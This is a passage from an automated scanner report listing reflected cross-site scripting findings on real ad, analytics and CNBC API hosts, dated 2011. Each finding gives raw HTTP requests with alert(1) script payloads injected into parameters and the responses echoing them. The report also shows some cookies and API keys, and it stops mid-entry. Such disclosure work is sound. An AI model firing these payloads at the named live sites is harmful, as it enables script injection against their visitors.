GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=22577671e863<script>alert(1)</script>03af89ea0d9&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:21 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510

           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>


                                           java.lang.NumberFormatException: For input string: "22577671e863<script>alert(1)</script>03af89ea0d9"


                                                           </head>
...[SNIP]...

3.2. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 34bbc--><script>alert(1)</script>f035f2c61ed was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=151549134bbc--><script>alert(1)</script>f035f2c61ed&pid=2257767&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:19 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3548
Content-Type: text/plain

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>f035f2c61ed" -->
...[SNIP]...

3.3. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 1452a--><script>alert(1)</script>8a3c8bebaae was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=2257767&ps=-11452a--><script>alert(1)</script>8a3c8bebaae&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:24 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3987
Content-Type: text/plain

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>8a3c8bebaae" -->

...[SNIP]...

3.4. http://ads.rnmd.net/getAds [adDiv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.rnmd.net
Path:	/getAds

Issue detail

The value of the adDiv request parameter is copied into the HTML document as plain text between tags. The payload 5a098<img%20src%3da%20onerror%3dalert(1)>13fd8da2931 was submitted in the adDiv parameter. This input was echoed as 5a098<img src=a onerror=alert(1)>13fd8da2931 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /getAds?delivery=jsonp&adType=banner&adDiv=rnmdad5a098<img%20src%3da%20onerror%3dalert(1)>13fd8da2931&appId=cnbc_web&t=other,OFFDECK&w=300&h=50&v=1&ck=1315339668282 HTTP/1.1
Host: ads.rnmd.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.cnbc.com/mytestc3e92%27-prompt(document.location)-%27f261e685920/ipecho.php

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:53 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
x-rnmd-pc: 208.91.189.56
Content-Type: application/x-javascript
Content-Length: 709
Set-Cookie: personCookie=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8; Expires=Wed, 05-Sep-2012 15:07:53 GMT
Connection: close

net.rnmd.sdk._private.JsonHelper.completeRequest({"personCookie":"208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8","adDiv":"rnmdad5a098<img src=a onerror=alert(1)>13fd8da2931","htmlPayload":"<div style=\"text-align: center\">
...[SNIP]...

3.5. http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api-cdn.cnbc.com
Path:	/api/chart/chart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 34781<script>alert(1)</script>ee34ae3f437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/chart/chart.asp?34781<script>alert(1)</script>ee34ae3f437=1 HTTP/1.1
Host: api-cdn.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html
Cache-Control: private
Expires: Tue, 06 Sep 2011 16:25:59 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Date: Tue, 06 Sep 2011 17:05:59 GMT
Content-Length: 182
Connection: close

<pre>An Error occurred with this request.

34781<script>alert(1)</script>ee34ae3f437=1</pre>&34781<script>alert(1)</script>ee34ae3f437=1&DCLCore.InternalID=CNAPI">Test link</a><br />

3.6. http://api-public.addthis.com/url/shares.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api-public.addthis.com
Path:	/url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c34f5<script>alert(1)</script>a13262bf45d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.dove.us%2FProducts%2FHair%2F&callback=_ate.cbs.sc_httpwwwdoveusProductsHair68c34f5<script>alert(1)</script>a13262bf45d HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,72|36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Tue, 06 Sep 2011 16:45:50 GMT
Content-Length: 96
Connection: close

_ate.cbs.sc_httpwwwdoveusProductsHair68c34f5<script>alert(1)</script>a13262bf45d({"shares":19});

3.7. http://api.bizographics.com/v1/profile.json [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload e1c14<script>alert(1)</script>d994c816c62 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ffe1c14<script>alert(1)</script>d994c816c62&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:13 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (7a1b8d0563d44781afdd2ab0834934ffe1c14<script>alert(1)</script>d994c816c62)

3.8. http://api.bizographics.com/v1/profile.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e6718<script>alert(1)</script>2d7bd36d61c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callbacke6718<script>alert(1)</script>2d7bd36d61c HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 06 Sep 2011 15:33:16 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 204
Connection: keep-alive

_bizo_callbacke6718<script>alert(1)</script>2d7bd36d61c({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 5af80<script>alert(1)</script>e6879303a2a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a55af80<script>alert(1)</script>e6879303a2a&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315321124004408%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:50 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1ab5c8f2c82f8e20ad7e6bdfc8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a55af80<script>alert(1)</script>e6879303a2a)

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload db976<script>alert(1)</script>5d2b699441d was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=db976<script>alert(1)</script>5d2b699441d HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:52 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1ab5c8f2c82f8e20ad7e6bdfc8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: db976<script>alert(1)</script>5d2b699441d

3.11. http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.cnbc.com
Path:	/api/chart/chart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 90215<script>alert(1)</script>736c487a586 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/chart/chart.asp?90215<script>alert(1)</script>736c487a586=1 HTTP/1.1
Host: api.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:06:00 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 182
Expires: Tue, 06 Sep 2011 16:26:00 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<pre>An Error occurred with this request.

90215<script>alert(1)</script>736c487a586=1</pre>&90215<script>alert(1)</script>736c487a586=1&DCLCore.InternalID=CNAPI">Test link</a><br />

3.12. http://api.cnbc.com/api/movers/movers.asp [chartType parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.cnbc.com
Path:	/api/movers/movers.asp

Issue detail

The value of the chartType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f0d"><script>alert(1)</script>2d1497842a9 was submitted in the chartType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/movers/movers.asp?chartType=gainers98f0d"><script>alert(1)</script>2d1497842a9&rowCount=3&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:57:13 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:17:13 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 1975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Market Movers</title>
<link rel='stylesheet' ty
...[SNIP]...
<div id="module" rowCount="3" chartType="gainers98f0d"><script>alert(1)</script>2d1497842a9">
...[SNIP]...

3.13. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.cnbc.com
Path:	/api/movers/movers.asp

Issue detail

The value of the rowCount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 467b2"><script>alert(1)</script>23b923cf03b was submitted in the rowCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/movers/movers.asp?chartType=gainers&rowCount=3467b2"><script>alert(1)</script>23b923cf03b&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:57:16 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:17:15 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 53613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Market Movers</title>
<link rel='stylesheet' ty
...[SNIP]...
<div id="module" rowCount="3467b2"><script>alert(1)</script>23b923cf03b" chartType="gainers">
...[SNIP]...

3.14. http://api.viglink.com/api/ping [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.viglink.com
Path:	/api/ping

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3a9ec<script>alert(1)</script>4d02caaf2cd was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=021de175e1e571c67cfaeea3c68d72e8&loc=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&v=1&jsonp=vglnk_jsonp_131534117167203a9ec<script>alert(1)</script>4d02caaf2cd HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
Origin: http://www.readwriteweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://www.readwriteweb.com
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en-US
Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Sep 2011 15:33:39 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 160
Connection: keep-alive

vglnk_jsonp_131534117167203a9ec<script>alert(1)</script>4d02caaf2cd(1315323219590,2000,[],[],{"plugins":{},"timeClick":true,"debug":false,"timePing":false},[]);

3.15. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload b7be8<script>alert(1)</script>8499cdf77af was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2b7be8<script>alert(1)</script>8499cdf77af&c2=1000004&c3=&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:00:30 GMT
Date: Tue, 06 Sep 2011 15:00:30 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2b7be8<script>alert(1)</script>8499cdf77af", c2:"1000004", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.16. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

